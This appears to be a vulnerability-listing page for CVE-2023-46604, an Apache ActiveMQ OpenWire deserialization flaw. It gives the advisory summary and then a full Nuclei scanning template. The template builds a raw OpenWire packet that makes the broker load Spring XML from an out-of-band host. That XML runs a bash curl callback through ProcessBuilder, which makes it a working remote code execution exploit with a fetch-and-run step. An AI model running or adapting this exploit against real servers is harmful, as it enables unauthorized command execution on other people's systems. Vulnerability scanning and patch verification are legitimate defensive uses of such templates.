Apache ActiveMQ is vulnerable to Remote Code Execution.The vulnerability may allow a remote attacker with network access to a broker to run arbitrary shell commands by manipulating serialized class types in the OpenWire protocol to cause the broker to instantiate any class on the classpath.
Users are recommended to upgrade to version 5.15.16, 5.16.7, 5.17.6, or 5.18.3, which fixes this issue.
PoC代码[已公开]
id: CVE-2023-46604
info:
name: Apache ActiveMQ - Remote Code Execution
author: Ice3man,Mzack9999,pdresearch
severity: critical
description: |
Apache ActiveMQ is vulnerable to Remote Code Execution.The vulnerability may allow a remote attacker with network access to a broker to run arbitrary shell commands by manipulating serialized class types in the OpenWire protocol to cause the broker to instantiate any class on the classpath.
Users are recommended to upgrade to version 5.15.16, 5.16.7, 5.17.6, or 5.18.3, which fixes this issue.
reference:
- http://www.openwall.com/lists/oss-security/2023/10/27/5
- https://activemq.apache.org/security-advisories.data/CVE-2023-46604-announcement.txt
- https://github.com/X1r0z/ActiveMQ-RCE
- https://attackerkb.com/topics/IHsgZDE3tS/cve-2023-46604/rapid7-analysis?referrer=etrblog
- https://paper.seebug.org/3058/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-46604
cwe-id: CWE-502
epss-score: 0.94436
epss-percentile: 0.99986
cpe: cpe:2.3:a:apache:activemq:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: apache
product: activemq
shodan-query:
- product:"ActiveMQ OpenWire Transport"
- cpe:"cpe:2.3:a:apache:activemq"
- product:"activemq openwire transport"
tags: cve,cve2023,network,rce,apache,activemq,deserialization,js,kev,vkev
variables:
prefix: "1f00000000000000000001010042"
classname: "6f72672e737072696e676672616d65776f726b2e636f6e746578742e737570706f72742e436c61737350617468586d6c4170706c69636174696f6e436f6e7465787401"
final: "{{prefix}}{{classname}}"
javascript:
- pre-condition: |
isPortOpen(Host,Port);
code: |
let m1 = require('nuclei/net');
let m2 = require('nuclei/bytes');
let b = m2.Buffer();
let name=Host+':'+Port;
let conn = m1.Open('tcp', name);
let randomvar = '{{randstr}}'.toLowerCase();
var Base64={encode: btoa}
exploit_xml=`http://${oob}/b64_body:`+Base64.encode('<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation=" http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd"> <bean id="pb" class="java.lang.ProcessBuilder"> <constructor-arg> <list value-type="java.lang.String"><value>bash</value><value>-c</value><value>curl http://$(echo '+randomvar+').'+oob+'</value> </list> </constructor-arg> <property name="whatever" value="#{ pb.start() }"/> </bean></beans>') +'/'
packet="00000001100000006401010100436f72672e737072696e676672616d65776f726b2e636f6e746578742e737570706f72742e46696c6553797374656d586d6c4170706c69636174696f6e436f6e74657874010"
packet+=(exploit_xml.length).toString(16)
packet+=(b.WriteString(exploit_xml)).Hex()
conn.SendHex(packet);
resp = conn.RecvString()
randomvar
args:
Host: "{{Host}}"
Port: "61616"
oob: "{{interactsh-url}}"
matchers:
- type: dsl
dsl:
- 'contains(interactsh_protocol, "dns")'
- 'contains(interactsh_request, response)'
condition: and
# digest: 490a0046304402202142a2a04b5af91d5e8c4072d5f3657a303ad098ab2bc366114f604d8660144202204855d9595d04e2226b04497d0f9b159e60fef3f2f935eeb51bfe4c97013afdfb:922c64590222798bb761d5b6d8e72950